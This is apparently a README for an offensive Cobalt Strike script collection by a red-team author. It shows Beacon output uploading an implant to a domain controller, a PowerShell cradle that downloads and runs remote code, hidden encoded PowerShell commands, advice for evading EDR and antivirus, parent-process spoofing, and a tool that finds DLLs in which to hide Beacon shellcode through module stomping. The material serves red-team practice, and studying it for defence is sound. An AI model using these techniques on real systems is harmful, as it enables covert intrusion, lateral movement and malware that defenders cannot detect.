Home

Awesome

cobalt-arsenal

My published set of Aggressor Scripts for Cobalt Strike 4.0+

beacon> upload implant.exe \\DC1\c$\windows\temp\implant.exe
[*] Tasked Beacon to upload file (size: 929.25KB, md5: 6465bb8a4af8dd2d93f8f386a16be341) from: (implant.exe) to: (\\DC1\c$\windows\temp\implant.exe)
[+] host called home, sent: 951655 bytes

		set POWERSHELL_DOWNLOAD_CRADLE {
			return "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')";
		}
		[...]

		set POWERSHELL_COMMAND {
		[...]
			return "powershell -nop -w hidden -encodedcommand $script";
		}

Aforementioned methods are heavily flagged these days by EDRs and AVs so we would prefer to avoid their use. It so happens that Cobalt Strike by default embeds them excessively, generating lot of noise in such systems. We can tell Cobalt Strike to structure it's Powershell use patterns differently. However, some of introduced custom methods may not work. In such situations, we can always switch back to battle tested Cobalt Strike defaults by setting $USE_UNSAFE_ENCODEDCOMMAND_AND_IEX = 2; in the script's header.

FilesColor example

The same command is also exposed as an alias:

beacon> autoppid
[*] Tasked Beacon to find svchost.exe running as SYSTEM and make it the PPID.
[.] host called home, sent: 12 bytes
Future post-ex jobs will be spawned with fake PPID set to:
	svchost.exe	604	700	x64	NT AUTHORITY\SYSTEM	0

[*] Tasked beacon to spoof 700 as parent process
[.] host called home, sent: 12 bytes

Help:

PS C:\> py .\stomp-dll-info.py --help

    :: stomp-dll-info.py - Your Module Stomping / DLL Hollowing candidates headhunter!
    A script that scans, filters, analyzes DLL files displaying viable candidates for module stomping.

    Mariusz Banach / mgeeky, '21
    <mb [at] binary-offensive.com>

usage: .\stomp-dll-info.py [options] <path>

positional arguments:
  path                  Path to a DLL/directory.

optional arguments:
  -h, --help            show this help message and exit
  -r, --recurse         If <path> is a directory, perform recursive scan.
  -v, --verbose         Verbose mode.

Output sorting:
  -a, --ascending       Sort in ascending order instead of default of descending.
  -c COLUMN, --column COLUMN
                        Sort by this column name. Default: filename. Available columns: "type", "filename", "file size", "image size", "code size", "hollow size", ".NET", "signed", "in System32", "in SysWOW64", "used by", "path"
  -n NUM, --first NUM   Show only first N results, as specified in this paremeter. By default will show all candidates.

Output filtering:
  -C CODESIZE, --min-code-size CODESIZE
                        Show only modules with code section bigger than this value.
  -I IMAGESIZE, --min-image-size IMAGESIZE
                        Show only modules which images are bigger than this value.
  -E HOLLOWSIZE, --hollow-size HOLLOWSIZE
                        Show only modules with enough room to fit shellcode in Module Stomping / DLL Hollowing technique. Example Beacon size requirement: 300KB (307200).
  -S SIZE, --min-file-size SIZE
                        Show only modules of size bigger than this value. Cobalt Strike c2lint complains when module stomping target is smaller than 23MB (24117248).
  -P NAME, --process NAME
                        Show only modules that are used by this process.
  -U, --used            Show only modules that are used by any process in the system.
  -Q, --not-used        Show only modules that are NOT used by any process in the system.
  -D, --dotnet          Show only modules that are .NET assemblies.
  -G, --signed          Show only code signed modules.
  -H, --unsigned        Show only unsigned modules.
  -W, --system-cross-arch
                        Show only modules that are present in both System32 and SysWOW64 directories.

Example usage:

PS C:\> py stomp-dll-info.py C:\Windows\System32 -c 'hollow size' -W -E 307200 -n 20

    :: stomp-dll-info.py - Your Module Stomping / DLL Hollowing candidates headhunter!
    A script that scans, filters, analyzes DLL files displaying viable candidates for module stomping.

    Mariusz Banach / mgeeky, '21
    <mb [at] binary-offensive.com>

+----+------+----------------------------------------+-----------+------------+-----------+---------------+-------+-----------------------+-------------+-------------+------------------------------------------+------------------------------------------+
| #  | type |                filename                | file size | image size | code size | ▼ hollow size | .NET  |        signed         | in System32 | in SysWOW64 |                 used by                  |                   path                   |
+----+------+----------------------------------------+-----------+------------+-----------+---------------+-------+-----------------------+-------------+-------------+------------------------------------------+------------------------------------------+
| 0  | dll  |               mshtml.dll               | 23447040  |  23552000  | 16574643  |   14951811    | False |       Unsigned        |    True     |    True     |                                          |      C:\Windows\System32\mshtml.dll      |
| 1  | dll  |              edgehtml.dll              | 26269184  |  26406912  | 18349083  |   12778123    | False |       Unsigned        |    True     |    True     |              SearchApp.exe               |     C:\Windows\System32\edgehtml.dll     |
| 2  | dll  |          Windows.UI.Xaml.dll           | 17539584  |  17567744  | 12105148  |    8655164    | False |       Unsigned        |    True     |    True     |  SystemSettings.exe, TextInputHost.exe,  | C:\Windows\System32\Windows.UI.Xaml.dll  |
|    |      |                                        |           |            |           |               |       |                       |             |             |      explorer.exe, Calculator.exe,       |                                          |
|    |      |                                        |           |            |           |               |       |                       |             |             |      SearchApp.exe, onenoteim.exe,       |                                          |
|    |      |                                        |           |            |           |               |       |                       |             |             |       StartMenuExperienceHost.exe,       |                                          |
|    |      |                                        |           |            |           |               |       |                       |             |             |  Video.UI.exe, ShellExperienceHost.exe,  |                                          |
|    |      |                                        |           |            |           |               |       |                       |             |             |           WindowsTerminal.exe,           |                                          |
|    |      |                                        |           |            |           |               |       |                       |             |             |    Microsoft.Photos.exe, LockApp.exe,    |                                          |
|    |      |                                        |           |            |           |               |       |                       |             |             |              YourPhone.exe               |                                          |
| 3  | dll  |                wmp.dll                 | 11500544  |  11587584  |  8181400  |    6644984    | False |       Unsigned        |    True     |    True     |                                          |       C:\Windows\System32\wmp.dll        |
| 4  | dll  | Windows.Media.Protection.PlayReady.dll | 10352400  |  10309632  |  7175422  |    6218542    | False | Microsoft Corporation |    True     |    True     |                                          | C:\Windows\System32\Windows.Media.Protec |

[...]

☕ Show Support ☕

This and other projects are outcome of sleepless nights and plenty of hard work. If you like what I do and appreciate that I always give back to the community, Consider buying me a coffee (or better a beer) just to say thank you! 💪


Mariusz Banach / mgeeky, (@mariuszbit)
<mb [at] binary-offensive.com>